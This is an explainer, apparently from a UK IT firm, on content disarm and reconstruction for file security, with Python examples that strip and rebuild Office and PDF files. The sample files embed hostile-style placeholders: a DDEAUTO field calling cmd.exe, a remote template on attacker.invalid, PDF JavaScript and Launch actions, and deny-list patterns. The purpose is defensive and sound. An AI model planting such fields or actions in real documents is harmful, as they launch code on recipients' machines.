Content disarm and reconstruction (CDR): What it is and why your business needs it


Updated 4 February 2026 · Originally published 22 May 2025 · Ihor Havrysh



Quick answer: Content disarm and reconstruction (CDR) is a security technology that strips potentially dangerous elements from files and rebuilds clean, safe versions. Unlike antivirus, which tries to spot known threats, CDR assumes every file could be risky and removes anything that doesn't belong. It catches zero-day attacks, polymorphic malware, and threats that slip straight past traditional scanning. Processing takes under 200 milliseconds per file, and the cleaned file looks and works like the original.

Your business receives files every day. CVs from job applicants, invoices from suppliers, contracts from partners, spreadsheets from clients. Every one of those files could be carrying something nasty, and your antivirus probably won't catch it.

That's not scaremongering. Signature-based antivirus can only stop threats it already knows about, and attackers are constantly creating new ones. A single weaponised Word document or PDF can bypass your entire security stack, and once it's opened, the damage is done.

Content disarm and reconstruction takes a completely different approach. Instead of trying to figure out what's dangerous, CDR strips out everything that could potentially cause harm and rebuilds a clean version of the file. The text, formatting, and images survive. The macros, hidden scripts, and embedded nasties don't. Your team gets the file they need, minus the risk.

This guide explains how CDR works, why it matters for UK businesses, how it compares to other security approaches, and how to choose and deploy a solution.

What is content disarm and reconstruction?

Content disarm and reconstruction (CDR) is a cybersecurity technology that removes potentially malicious code from files. You'll also hear it called threat extraction, file sanitisation, or data sanitisation, but the idea is the same. CDR takes an incoming file, tears it apart, throws away anything that could be weaponised, and rebuilds a clean version that's safe to open.

Here's the bit that makes it different from everything else: CDR doesn't try to detect malware. It doesn't scan for known threats, check signatures, or watch for suspicious behaviour. It simply removes all file components that aren't explicitly approved by the system's policies and the file format's own specifications.

Think of it like airport security for your files. Rather than trying to identify every possible weapon, CDR effectively disassembles your luggage, checks every item against an approved list, bins anything that shouldn't be there, and repacks a clean bag for you on the other side. The process is thorough, fast, and doesn't rely on anyone recognising the specific threat.

The core principle: CDR operates on a zero-trust model for files. Every incoming file is treated as potentially dangerous, regardless of its source. Only content that can be verified as safe and necessary for the file to work properly is kept. Everything else goes.

A brief history of CDR

CDR's roots go back to the late 1990s when macro viruses first started causing headaches across corporate networks. Back then, the earliest form of CDR was blunt but effective: antivirus vendors would simply strip all macros from Microsoft Office documents, regardless of whether individual macros were malicious or perfectly legitimate.

Over time, the approach got smarter. Security researchers started figuring out ways to tell safe file components from dangerous ones, and the technology evolved from crude macro-stripping into sophisticated reconstruction engines that can preserve full file functionality while eliminating virtually all exploitable components.

The analyst firm Gartner has since identified CDR as a "high benefit" technology for network infrastructure security, and the tech has gained serious traction in defence, government, and financial services. It's now making its way into the broader business market too - and it's about time.

Three levels of CDR

Not all CDR solutions are created equal. The technology exists at three distinct levels, each offering a different trade-off between security and usability.

Level 1: Flatten
  How it works: converts every file to a flat PDF
  Security: maximum
  Usability: low - spreadsheets lose formulas, presentations become image galleries
  Best for: high-security environments where files only need to be viewed, not edited

Level 2: Strip
  How it works: removes active content but keeps the original file type
  Security: high
  Usability: medium - Word stays Word, but macros and scripts are gone
  Best for: general business use where some functionality loss is acceptable

Level 3: Rebuild
  How it works: reconstructs files from clean templates using positive selection
  Security: maximum
  Usability: high - files look and work like the originals
  Best for: businesses that need both strong security and full file functionality

Level 3 is where the real magic happens. Rather than just chopping bits out of the original file (which can leave behind structural vulnerabilities), Level 3 CDR creates a brand-new file from a clean template and transfers only the verified safe content across. It's like rebuilding a house from scratch using only the materials that passed inspection, rather than trying to patch up a house that might have hidden problems in the walls. One caveat worth knowing: the rebuild engine still has to parse the hostile original to extract that content, so the engine's own parsers are attack surface in their own right and should run in an isolated, least-privilege process.

Advanced Level 3 systems process files in under 200 milliseconds. That's fast enough to sit inline on an email gateway handling thousands of messages per hour without anyone noticing a delay.

Why traditional antivirus isn't enough

Let's be clear: antivirus software still has a place in your security setup. But relying on it as your primary defence against file-based threats is a bit like locking your front door while leaving the windows wide open.

Traditional antivirus works on signature-based detection. It compares incoming files against a database of known malware signatures - specific patterns in code that identify known threats. If there's a match, the file gets blocked. If there isn't, it sails through.

The problem? Attackers know exactly how this works, and they've got very good at getting around it.

The UK threat landscape in numbers

The UK government's Cyber Security Breaches Survey 2025 paints a sobering picture. Over four in ten UK businesses (43%) reported a breach in the past twelve months. For medium-sized firms, that figure jumps to 70%. For large organisations, it's 74%.

Key figures at a glance:

  • 43% of UK businesses hit by a breach
  • 43% of malware downloads hidden in Office docs
  • 450k+ new malware variants created daily
  • 56% of phishing emails pass all security layers

And it's getting worse. Ransomware incidence among UK businesses doubled in a single year, jumping from less than 0.5% to 1% - that's an estimated 19,000 organisations affected. The average cost of a data breach for UK organisations now stands at £3.29 million, according to IBM's 2025 Cost of a Data Breach report. In financial services, it's £5.74 million.

File-based attacks are at the heart of this. Around 43% of all malware downloads are now hidden inside Microsoft Office documents - a three-fold increase from 2020. 94% of malware arrives via email. These aren't exotic, sophisticated attacks. They're weaponised Word documents and dodgy PDFs landing in inboxes every single day.

The detection gap

The AV-TEST Institute registers over 450,000 new malicious programmes daily. That's 164 million new malware variants per year. Before any of them can be caught by signature-based antivirus, they need to be discovered, analysed, and added to signature databases. That takes time - often days or weeks - and during that window, the malware spreads freely.

The numbers on this are brutal. Research from VulnCheck found that 28.3% of Known Exploited Vulnerabilities in early 2025 were being actively exploited within just one day of disclosure. Attackers are faster than the patch-and-signature cycle can keep up with.

The zero-day reality: In 2024, 75 zero-day vulnerabilities were exploited in the wild. By definition, no signature exists for these until after someone has caught them in use, so signature-based antivirus can't detect the first wave. CDR doesn't need to know about them - it strips the attack vectors regardless of whether the exploit is known.

Evasion is the norm, not the exception

Modern malware actively tries to dodge detection. Polymorphic malware changes its code each time it infects a new system. Metamorphic malware rewrites its own underlying code while keeping its functionality. And in 2025, 82.6% of phishing emails contain AI-generated content, making them more convincing and harder for automated systems to flag.

Research shows that 56% of phishing emails now pass through all existing security layers - antivirus, email gateways, authentication protocols, the lot. 77% of successful ransomware attacks used techniques that bypassed the victim's antivirus entirely. These aren't edge cases. This is the new normal.

Where CDR changes the game

CDR sidesteps the entire detection problem. It doesn't need to know what the malware looks like, because it's not looking for malware at all. It simply removes any file component that could potentially carry a payload - macros, scripts, embedded objects, the lot - regardless of whether those components are actually malicious.

A zero-day exploit hidden in a Word macro? Gone. A never-before-seen script buried in a PDF? Gone. A polymorphic payload stuffed into an OLE object? Also gone. CDR doesn't care how clever or novel the attack is. If it relies on active content to execute, it can't survive the CDR process. Exploits that target a bug in the viewer's parser rather than active content - a malformed font, image or object table, say - are handled by reconstruction rather than stripping: the rebuilt file contains the engine's own well-formed structures, not the attacker's malformed ones.

That's the fundamental difference. Antivirus asks "is this file dangerous?" and often gets it wrong. CDR asks "does this file contain anything that could be dangerous?" and removes it, full stop.

How CDR works step by step

CDR follows a structured, five-stage process. Each file goes through every stage, and the whole thing typically completes in under 200 milliseconds. Here's what happens behind the scenes.

The five-step CDR process: identify, decompose, evaluate, disarm, and reconstruct

1 File identification

The CDR system identifies the file's actual format by analysing its binary structure and headers - not just the file extension. This catches a common attacker trick called file masquerading, where a malicious executable is renamed with a .pdf or .docx extension to sneak past simpler security checks.

2 File decomposition

The file is broken down into every individual component. A Word document, for example, is actually a ZIP archive containing XML files and embedded resources. The CDR system unpacks the entire structure, revealing every layer - text content, formatting data, images, VBA macro streams, OLE objects, and anything else hiding inside.

3 Policy evaluation

Each component is evaluated against the organisation's security policies and the file format's specifications. This is not malware detection. The system doesn't ask "is this macro dangerous?" - it asks "are macros allowed in files arriving through this channel?" If the answer is no, the macro is flagged for removal regardless of its content.

4 Disarmament

All flagged elements are removed. This includes macros and VBA code, JavaScript (especially in PDFs), embedded scripts, OLE objects, DDE links, ActiveX controls, suspicious metadata, and external references like remote template links. The specific elements removed depend on the organisation's policy settings.

5 Reconstruction

In Level 3 CDR, a brand-new file is built from a clean template matching the original file format. Only verified safe content is transferred into this new file - text, formatting, images, tables, and formulas all make the cut. The result is a file that looks and works like the original but is built from pristine, verified components.
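
To make the five steps concrete, here is an added example (not code from the original article or from any vendor's engine) that runs them over a constructed, deliberately "weaponised" .docx held in memory: magic-byte identification, unpacking of the ZIP parts, a policy pass that reports what is disallowed without judging whether it is malicious, and a rebuild that writes only allow-listed parts into a brand-new ZIP. The allow-list of parts, the denied relationship types, the DDE field handling and the sample document are all assumptions for illustration; a production engine would also validate every XML part against the OOXML schema before copying it across.

```python
"""The five CDR steps on an OOXML (.docx) container - added example, not vendor code."""
import io
import re
import zipfile

# Step 1: identify the real format from leading bytes, never from the extension.
MAGIC = [
    (b"PK\x03\x04", "zip-container"),
    (b"%PDF-", "pdf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2-legacy-office"),
    (b"MZ", "pe-executable"),
]

def identify(data: bytes) -> str:
    """Coarse type from magic bytes; an .exe renamed to .docx comes back as 'pe-executable'."""
    for sig, kind in MAGIC:
        if data.startswith(sig):
            return kind
    return "unknown"

# Step 2: unpack every part of the container.
def decompose(data: bytes) -> dict:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}

# Step 3: policy (an assumption for this example). A part survives only if it is on the
# allow-list; the deny rules exist so the report can say what was dropped and why.
ALLOWED_PARTS = [re.compile(p) for p in (
    r"^\[Content_Types\]\.xml$", r"^_rels/\.rels$", r"^word/_rels/document\.xml\.rels$",
    r"^word/document\.xml$", r"^word/styles\.xml$", r"^word/media/[^/]+\.(png|jpe?g|gif)$",
)]
DENIED_PARTS = {"vba_macro": r"^word/vbaProject\.bin$", "ole_object": r"^word/embeddings/",
                "activex": r"^word/activeX/"}
DENIED_RELS = {"remote_template": b"attachedTemplate", "vba_macro": b"vbaProject",
               "ole_object": b"oleObject"}
DDE_FIELD = re.compile(rb"(<w:instrText\b[^>]*>)\s*DDE(?:AUTO)?\b[^<]*(</w:instrText>)", re.I)
REL_ELEMENT = re.compile(rb"<Relationship\b[^>]*/>")

def evaluate(parts: dict) -> list:
    """Return (label, part_name) findings. Nothing here judges whether content is malicious."""
    findings = []
    for name, body in parts.items():
        for label, pattern in DENIED_PARTS.items():
            if re.search(pattern, name):
                findings.append((label, name))
        if name.endswith(".rels"):
            for label, marker in DENIED_RELS.items():
                if marker in body:
                    findings.append((label, name))
        elif name.endswith(".xml") and DDE_FIELD.search(body):
            findings.append(("dde_field", name))
    return findings

# Steps 4 and 5: positive selection into a brand-new ZIP. Allow-listed parts are copied
# across (cleaned on the way); everything else, including the macro storage, is never written.
def disarm_and_rebuild(parts: dict) -> bytes:
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in parts.items():
            if not any(p.match(name) for p in ALLOWED_PARTS):
                continue
            if name.endswith(".rels"):   # drop relationships to templates, macros, OLE
                body = REL_ELEMENT.sub(
                    lambda m: b"" if any(k in m.group(0) for k in DENIED_RELS.values())
                    else m.group(0), body)
            elif name.endswith(".xml"):  # field keeps its shape but loses its DDE instruction
                body = DDE_FIELD.sub(rb"\1\2", body)
            zf.writestr(name, body)
    return out.getvalue()

def sanitise(data: bytes) -> tuple:
    kind = identify(data)
    if kind != "zip-container":
        raise ValueError(f"refusing to process: identified as {kind}, not an OOXML container")
    parts = decompose(data)
    return evaluate(parts), disarm_and_rebuild(parts)

# Constructed sample: a minimal "weaponised" .docx with a macro project, an OLE object,
# a DDEAUTO field and a remote template link. All payloads are placeholders.
REL_NS = b"http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

def build_sample_docx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", b"<Types/>")
        zf.writestr("_rels/.rels", b"<Relationships/>")
        zf.writestr("word/document.xml",
            b"<w:document><w:p><w:r><w:t>Invoice Q3</w:t></w:r><w:r>"
            b'<w:instrText xml:space="preserve"> DDEAUTO c:\\windows\\system32\\cmd.exe "/c calc" '
            b"</w:instrText></w:r></w:p></w:document>")
        zf.writestr("word/_rels/document.xml.rels",
            b'<Relationships><Relationship Id="rId1" Type="' + REL_NS + b'image" Target="media/image1.png"/>'
            b'<Relationship Id="rId2" Type="' + REL_NS + b'attachedTemplate" '
            b'Target="http://attacker.invalid/t.dotm" TargetMode="External"/></Relationships>')
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder macro storage")
        zf.writestr("word/embeddings/oleObject1.bin", b"\xd0\xcf\x11\xe0 placeholder OLE object")
        zf.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n placeholder image")
    return buf.getvalue()

if __name__ == "__main__":
    found, clean = sanitise(build_sample_docx())
    print("flagged:", found)
    print("kept:", list(decompose(clean)))
```

Running it reports four findings (the macro project, the OLE object, the remote template relationship and the DDE field) and the rebuilt container holds five parts: the content types, both relationship files (with the attachedTemplate relationship gone), the document XML with the field instruction emptied, and the image. The point to notice is that the macro storage was never "deleted"; it simply never made it into the new file.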

What gets stripped, what gets kept

Removed (potentially dangerous):

  • Macros and VBA code
  • JavaScript (in PDFs, HTML)
  • Embedded scripts (VBScript, etc.)
  • OLE objects and embedded executables
  • DDE links
  • ActiveX controls
  • Remote template references
  • Hidden executable content

Preserved (safe content):

  • Text content and paragraphs
  • Formatting, fonts, and colours
  • Images and charts (after verification)
  • Tables and cell structure
  • Spreadsheet formulas (after analysis)
  • Document layout and page structure
  • Hyperlinks (sanitised URLs)
  • Metadata (if policy permits)
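
The same policy-not-detection logic applied to a PDF, as an added example that is not part of the original article or any vendor's product: a constructed, uncompressed PDF carrying a document-open JavaScript action and a page-open Launch action is split into objects, the objects and dictionary keys the policy forbids are dropped, and the survivors are re-serialised with a fresh cross-reference table rather than patched in place. The policy lists and the sample file are assumptions; the regex parsing is a deliberate simplification that a real engine replaces with a full PDF parser (object streams, encryption, indirect /Length values).

```python
"""Policy-driven strip-and-rebuild of PDF active content - added example, not vendor code."""
import re

OBJ = re.compile(rb"(\d+) 0 obj\s*(.*?)\s*endobj", re.S)
REF = re.compile(rb"(\d+) 0 R")
# Policy (an assumption for this example): whole objects that are never carried across...
DENIED_OBJECTS = {
    "javascript_action": rb"/S\s*/JavaScript",
    "launch_action": rb"/S\s*/Launch",
    "embedded_file": rb"/Type\s*/EmbeddedFile",
}
# ...and dictionary keys that are cut out of the objects that do survive.
DENIED_KEYS = (
    rb"/OpenAction\s+\d+ 0 R",   # action fired when the document opens
    rb"/AA\s*<<[^<>]*>>",        # additional-actions dictionary (simplified: no nesting)
    rb"/JavaScript\s+\d+ 0 R",   # name tree of document-level scripts
    rb"/JS\s*\([^)]*\)",         # inline script string
)

def parse_objects(pdf: bytes) -> dict:
    """Map object number -> raw body (dictionary plus any stream). Regex-based on purpose."""
    return {int(num): body for num, body in OBJ.findall(pdf)}

def evaluate(objs: dict) -> dict:
    """Return {object number: policy label} for objects that will not be rebuilt."""
    flagged = {}
    for num, body in objs.items():
        for label, pattern in DENIED_OBJECTS.items():
            if re.search(pattern, body):
                flagged[num] = label
                break
    return flagged

def rebuild(objs: dict, flagged: dict) -> bytes:
    """Re-serialise the surviving objects with a fresh xref table instead of patching in place."""
    kept = {}
    for num, body in objs.items():
        if num in flagged:
            continue
        for pattern in DENIED_KEYS:
            body = re.sub(pattern, b"", body)
        kept[num] = body
    for num, body in kept.items():   # a reference to a dropped object would corrupt the output
        for ref in REF.findall(body):
            if int(ref) in flagged:
                raise ValueError(f"object {num} still references removed object {int(ref)}")
    out = bytearray(b"%PDF-1.7\n")
    offsets = {}
    for num in sorted(kept):
        offsets[num] = len(out)
        out += b"%d 0 obj\n%s\nendobj\n" % (num, kept[num])
    size = max(objs) + 1
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % size
    for num in range(1, size):   # dropped numbers become free entries so numbering stays valid
        out += (b"%010d 00000 n \n" % offsets[num]) if num in offsets else b"0000000000 65535 f \n"
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (size, xref_pos)
    return bytes(out)

def sanitise_pdf(pdf: bytes) -> tuple:
    if not pdf.startswith(b"%PDF-"):
        raise ValueError("not a PDF by magic bytes, whatever the extension says")
    objs = parse_objects(pdf)
    flagged = evaluate(objs)
    return flagged, rebuild(objs, flagged)

# Constructed sample: one page of text plus a document-open JavaScript action and a
# page-open Launch action. Placeholders only; nothing here is a working payload.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R /AA << /O 5 0 R >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /Contents 4 0 R /AA << /O 6 0 R >> >>
endobj
4 0 obj
<< /Length 47 >>
stream
BT /F1 12 Tf 72 712 Td (Quarterly report) Tj ET
endstream
endobj
5 0 obj
<< /S /JavaScript /JS (app.alert\\(1\\)) >>
endobj
6 0 obj
<< /S /Launch /F (cmd.exe) >>
endobj
"""

if __name__ == "__main__":
    flagged, clean = sanitise_pdf(SAMPLE_PDF)
    print("dropped:", flagged)
    print(clean.decode())
```

Objects 5 and 6 never reach the output, the catalog and page lose their /OpenAction and /AA entries, and the page content survives untouched. The dangling-reference check matters: a Level 2 strip that deleted object 5 but left /OpenAction 5 0 R behind would hand the viewer a file that is structurally broken, which is exactly the kind of leftover the rebuild approach avoids.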

Supported file types

CDR works across all the file types your business is likely to encounter:

  • Office documents: Word, Excel, PowerPoint (both modern OOXML and legacy formats), plus OpenDocument formats and RTF
  • PDFs: Including form fields, JavaScript removal, and embedded file extraction
  • Images: JPEG, PNG, GIF, TIFF, BMP - with steganography detection in advanced systems
  • Archives: ZIP, RAR, 7Z, CAB - with recursive extraction of nested archives
  • Email: PST, OST, EML, MSG containers and their attachments
  • Web content: HTML files with embedded scripts
  • Specialised formats: Advanced solutions support 200+ file types including CAD files, medical imaging (DICOM), and industry-specific formats

CDR vs antivirus vs sandboxing vs DLP

If you're weighing up your options for file security, here's how CDR stacks up against the other technologies you'll come across. Each has its strengths, and the best setups use them together. But understanding the differences helps you make smarter decisions about where to invest.

CDR
  Approach: prevention (strips and rebuilds)
  Zero-day protection: yes - inherent by design
  Processing speed: milliseconds (under 200 ms per file)
  Evasion resistance: high - nothing to evade
  False positives: none in the detection sense, because nothing is classified; the flip side is that legitimate active content is removed too (see the limitations section)
  File modification: yes - rebuilds files
  Best for: email gateways, file uploads, file transfers

Antivirus
  Approach: detection (signature matching)
  Zero-day protection: no - needs a signature update first
  Processing speed: seconds
  Evasion resistance: low - polymorphic malware evades easily
  False positives: variable (3-45 per test set)
  File modification: no - blocks or allows
  Best for: endpoints and servers

Sandboxing
  Approach: detection (behavioural analysis)
  Zero-day protection: partial - can be evaded
  Processing speed: 30 seconds to 5 minutes
  Evasion resistance: medium - sandbox-aware malware is common
  False positives: low but possible
  File modification: no - blocks or allows
  Best for: forensic analysis of suspicious files

DLP
  Approach: monitoring (data flow control)
  Zero-day protection: no - not its job
  Processing speed: seconds
  Evasion resistance: not applicable
  False positives: can be high without tuning
  File modification: no - blocks or allows
  Best for: preventing data leakage

EDR
  Approach: detection (endpoint behaviour)
  Zero-day protection: partial - detects behaviour, not the exploit
  Processing speed: real-time monitoring
  Evasion resistance: medium - "EDR killers" exist
  False positives: moderate
  File modification: no - blocks or allows
  Best for: detecting threats on endpoints

CDR vs antivirus: the detection gap

Research from WatchGuard found that traditional signature-based antivirus misses roughly 30% of malware variants that behavioural detection systems catch. That gap grows wider every year as attackers produce more variants faster. Around two-thirds of all malware seen in the wild is now zero-day, meaning it's never been catalogued. Antivirus can't catch what it's never seen before.

CDR doesn't have this problem. It strips active content from files whether or not that content is known to be malicious. No signatures needed, no database to update, no race against the clock.

CDR vs sandboxing: speed and evasion

Sandboxing opens suspicious files in an isolated virtual environment to watch what they do. It's clever, but it has two major weaknesses. First, it's slow. Sandbox analysis takes 30 seconds to 5 minutes per file, making it impractical for high-volume email gateways or file upload portals.

Second, modern malware knows how to spot a sandbox. Attackers build in checks for virtual machine indicators - CPU core counts, memory configurations, hardware IDs - and simply go dormant if they detect a test environment. Others use time delays, waiting hours or days before activating, long after the sandbox has given the all-clear. Some techniques are remarkably simple: the malware checks the time from multiple system APIs simultaneously, and if the results don't match (because the sandbox is fast-forwarding time), it knows it's being watched.

CDR doesn't need to observe behaviour. It doesn't run the file at all. It just tears it apart, throws away the dangerous bits, and rebuilds it clean. The whole process takes under 200 milliseconds.

Gartner's view: "As malware sandbox evasion techniques improve, the use of CDR at the email gateway as a supplement or alternative to sandboxing will increase." Gartner has also noted that "done well, CDR removes all threats from uploaded files without adding significant latency."

CDR vs DLP: different problems, same team

DLP (data loss prevention) and CDR solve completely different problems. CDR stops malicious code from getting in. DLP stops sensitive data from getting out. A file can be squeaky clean from a malware perspective but violate DLP policies because it contains customer credit card numbers being sent somewhere they shouldn't go.

The two technologies complement each other well. CDR at the email gateway sanitises incoming attachments. DLP monitors outgoing files and blocks data that shouldn't leave the organisation. Together, they cover both sides of the file security equation.

The bottom line: layered defence

No single technology stops everything. The strongest security setups layer multiple tools that each handle different parts of the problem. CDR at file ingestion points prevents file-based threats from entering. Antivirus on endpoints catches known threats that arrive through other channels. EDR spots suspicious behaviour if something gets through. DLP prevents sensitive data from leaving. Each layer picks up what the others miss.

If you're starting from scratch, CDR on your email gateway and file upload points is one of the highest-impact investments you can make. It closes the biggest gap in most organisations' file security. For more on building a complete security posture, see our guide to understanding phishing, ransomware, and malware.

Who needs CDR?

The short answer: any business that receives files from external sources. The longer answer depends on your industry, your risk profile, and how you handle files day to day.

Common use cases

  • File upload portals: If customers, applicants, or partners upload files to your systems, CDR cleans them before they touch your network
  • Email attachments: CDR sits on your email gateway and sanitises attachments before they reach inboxes
  • Cloud storage: Files syncing from OneDrive, Google Drive, Dropbox, Teams, or Slack can be cleaned in transit
  • Cross-domain transfers: Moving files between security domains (particularly in defence and government) is a textbook CDR use case
  • Supplier document exchange: Invoices, contracts, and specifications from external parties are all potential attack vectors
  • Browser isolation: CDR integrates with Remote Browser Isolation (RBI) to sanitise files downloaded within isolated browser sessions before they reach user devices

Industries with highest CDR adoption

CDR adoption is strongest in sectors where the consequences of a file-based breach are severe. Here's what that looks like across the UK:

Defence and government

The UK's 2025 Strategic Defence Review introduced the "Digital Targeting Web" concept - an integrated multi-domain warfare approach connecting sensors to decision-makers across military platforms, intelligence agencies, and NATO coalition partners. Secure file transfer across classification levels is mission-critical, and CDR-enabled cross-domain solutions from vendors like Everfox (formerly Forcepoint Federal) and Nexor provide hardware-enforced security with CDR built in. These systems use field-programmable gate array (FPGA) technology and hardware security modules to ensure files can't carry malicious code across domain boundaries.

Financial services

Financial institutions process huge volumes of customer documents - loan applications, regulatory filings, KYC documentation. The average breach cost in financial services hit $6.08 million in 2024, with the FCA and PRA both emphasising cybersecurity resilience. CDR on email gateways and file upload portals protects against the weaponised documents that frequently target banks and financial advisors.

Healthcare (NHS)

Healthcare experienced the highest average breach costs of any sector in 2024 at $9.77 million. The NHS Synnovis attack (covered below) is a painful reminder. CDR protects patient record transfers, clinical documents, referral letters, and medical imaging files (DICOM format) from embedded threats. One practical point: because reconstruction changes the file's bytes, any digital signature already applied to a document will no longer verify afterwards, so signed clinical documents need either a policy exception or re-signing after sanitisation, and any clinical decision support features that depend on embedded active content should be tested against your own files before rollout.

Legal

The NCSC's Cyber Threat Report on the UK Legal Sector identifies ransomware as a major threat, with attacks resulting in encrypted case files and client data published on the dark web. Tucker Solicitors LLP faced ICO enforcement action following a breach in 2024. Law firms handle hugely sensitive client information from multiple external parties, making CDR on email and document exchange platforms a natural fit.

Critical infrastructure

The UK Cyber Security and Resilience Bill 2025 expands regulatory requirements to include data centres, energy flexibility providers, and designated critical suppliers. CDR protects operational technology environments from file-based attacks that could disrupt essential services.

UK regulatory drivers

If you're wondering whether CDR is something your business actually needs or just a nice-to-have, the regulatory landscape is making that question easier to answer:

  • Cyber Security and Resilience Bill 2025: Introduced to Parliament in November 2025, this establishes the Cyber Assessment Framework (CAF) as the compliance standard. It significantly expands which organisations fall under regulation, with fines up to £17 million or 4% of global turnover. CDR addresses multiple CAF requirements around proactive threat prevention and "secure by design" principles. Royal Assent is expected during 2026.
  • NIS2 directive: If your business serves EU customers or operates within EU supply chains, NIS2 can apply to you regardless of Brexit. It mandates initial incident notification within 24 hours and requires technical measures proportionate to risk. CDR is one such measure for the file-based threat surface, covering known and unknown attack vectors alike.
  • GDPR Articles 32 and 35: GDPR requires "appropriate technical measures" taking into account the "state of the art." For businesses handling personal data through file transfers, CDR strengthens your position under a Data Protection Impact Assessment. It demonstrates proactive risk mitigation rather than reactive detection.
  • NCSC guidance: The National Cyber Security Centre has published extensive guidance on cross-domain solutions and file security, directly relevant for government and defence organisations. Alignment with NCSC standards provides procurement assurance for public sector contracts.

File-based threats don't discriminate by industry, though. If your business is a small accounting firm that processes client spreadsheets, you're just as much a target as a bank - arguably more so, because you likely have weaker defences.

Real-world examples: file-based attacks in the UK

File-based attacks aren't theoretical. UK organisations have been hit hard by attacks that exploited documents, files, and social engineering as the entry point. Here's what happened, and how better document security could have made a difference.

Marks & Spencer (April 2025)

The M&S cyber attack was one of the most damaging incidents to hit a UK retailer. Attackers used social engineering to impersonate an employee and trick a third-party provider into resetting an internal password. Once inside, they deployed DragonForce ransomware, encrypting virtual machines and crippling M&S's online ordering, Click and Collect, and contactless payment systems.

The breach went undetected for two days. By the time M&S leadership spotted it, the attackers had already moved laterally through the network and deployed encryption malware. Customer data including names, birth dates, addresses, phone numbers, and purchase histories was stolen.

The cost:

  • Market value dropped by over £700 million
  • Estimated losses of £40 million per week during disruption
  • Total profit losses estimated at approximately £300 million
  • Cyber insurance claim of up to £100 million

Co-op Group (April 2025) - a very different outcome

Just days after M&S, the Co-op was hit by an almost identical attack. Same social engineering tactics, same credential reset manipulation. But the outcome was starkly different.

The Co-op's security operations centre spotted the malicious activity within minutes. Their zero-trust network segmentation meant critical services like online retail and payments were on separate infrastructure, insulated from the breach. Containment actions were underway within hours.

The result? Estimated losses of around £100 million (versus M&S's £300 million), minimal customer-facing disruption, and most customers were unaware the breach had occurred. The lesson: detection speed and network architecture matter far more than having a bigger antivirus budget.

NHS Synnovis (June 2024)

The Qilin ransomware group hit Synnovis, a pathology service provider used by hospitals across London. The attack disrupted virtually all of Synnovis's IT systems, forcing the cancellation of at least 1,500 operations and outpatient appointments at King's College Hospital and Guy's and St Thomas' NHS trusts. That included over 100 cancer treatments and 18 organ transplants.

The attackers claimed to have stolen 400GB of data, including information from over 300 million patient interactions - blood test results, HIV test results, STI diagnoses, and cancer test results. They demanded $50 million in ransom. Services weren't fully restored until December 2024, six months after the attack began.

British Library (October 2023)

Attackers breached the British Library's systems and released stolen data on the dark web, including personal user information. The attack destroyed multiple capabilities simultaneously, requiring a complete rebuild of the entire technology infrastructure - a process that took well over a year. Digital collections and electronic resources remained unavailable long after the initial breach.

Where CDR fits in

Not all of these attacks could have been prevented by CDR alone - social engineering and credential theft require a different set of defences. But CDR would have closed off a major attack vector in several scenarios:

  • Spear phishing emails with weaponised attachments would have been stripped of macros and malicious content before reaching inboxes
  • File-based lateral movement within compromised networks - attackers planting weaponised documents on shared drives for other users to open - could have been blocked by CDR on internal file transfer points. It does nothing against credential-based movement over SMB or RDP, which ransomware operators also rely on once inside
  • Supply chain file transfers carrying malicious payloads would have been sanitised at the boundary

CDR isn't a silver bullet. But as part of a layered security approach - alongside network segmentation, rapid detection, and proper incident response plans - it removes one of the most common and effective attack vectors before it ever reaches your people. Learn more about building a complete security strategy in our cybersecurity essentials guide for UK SMEs.

Choosing a CDR solution

CDR solutions come in several flavours, and the right choice depends on how your business handles files and what level of integration you need.

Deployment models

Cloud API
  How it works: send files to a cloud CDR service via REST API and get clean files back
  Best for: developers building file handling into web apps, portals, or workflows
  Implementation timeline: 2-6 weeks

Email gateway
  How it works: CDR sits inline on your email infrastructure, cleaning attachments automatically
  Best for: businesses where email is the primary file delivery channel
  Implementation timeline: 4-8 weeks

Network gateway
  How it works: CDR appliance (or ICAP server) at the network perimeter, scanning all file traffic
  Best for: larger organisations with significant inbound file volume from multiple channels
  Implementation timeline: 3-6 months

Cloud storage
  How it works: integrates with OneDrive, Google Drive, Dropbox, Teams, and Slack to sanitise files in transit
  Best for: businesses with heavy collaboration platform usage
  Implementation timeline: 4-8 weeks

Browser isolation (RBI)
  How it works: CDR built into remote browser isolation, sanitising downloads from isolated sessions
  Best for: high-security environments, remote workers on untrusted networks
  Implementation timeline: 6-12 weeks

Cross-domain
  How it works: hardware-enforced CDR for secure file transfer between classified network domains
  Best for: defence, intelligence, government inter-agency operations
  Implementation timeline: 6-12 months

CDR deployment options with typical implementation timelines

UK CDR vendors

The UK market includes both domestic CDR specialists and international providers with strong UK presence:

  • Glasswall (UK-based) - The most prominent UK CDR specialist. Government and defence focus, with a strategic investment from PSG Equity in April 2025. Cloud-hosted, SaaS API, hybrid, or fully on-premises deployment options.
  • OPSWAT MetaDefender - Mature international platform combining Deep CDR with multiscanning (multiple AV engines simultaneously). Integrates with F5 BIG-IP and Palo Alto Networks. Tested by SE Labs.
  • Everfox (formerly Forcepoint Federal) - Cross-domain CDR specialist for defence and intelligence. Available on the G-Cloud framework for public sector procurement. Acquired Garrison Technology in August 2024 for FPGA-based hardware security.
  • Menlo Security (acquired Votiro, February 2025) - CDR integrated with browser isolation and secure workspace. The Votiro CDR technology now sits within Menlo's broader security platform.
  • Nexor (UK-based) - Cross-domain data transmission with integrated CDR for defence and government use cases. Aligned with UK Strategic Defence Review priorities.
  • Check Point Threat Extraction - CDR bundled within Check Point's Next Generation Threat Prevention package. Good fit if you're already running Check Point infrastructure.
  • Red Eagle Tech CDR API - Cloud-based, API-first CDR with UK data processing. Designed for straightforward integration into web applications and cloud-native architectures.

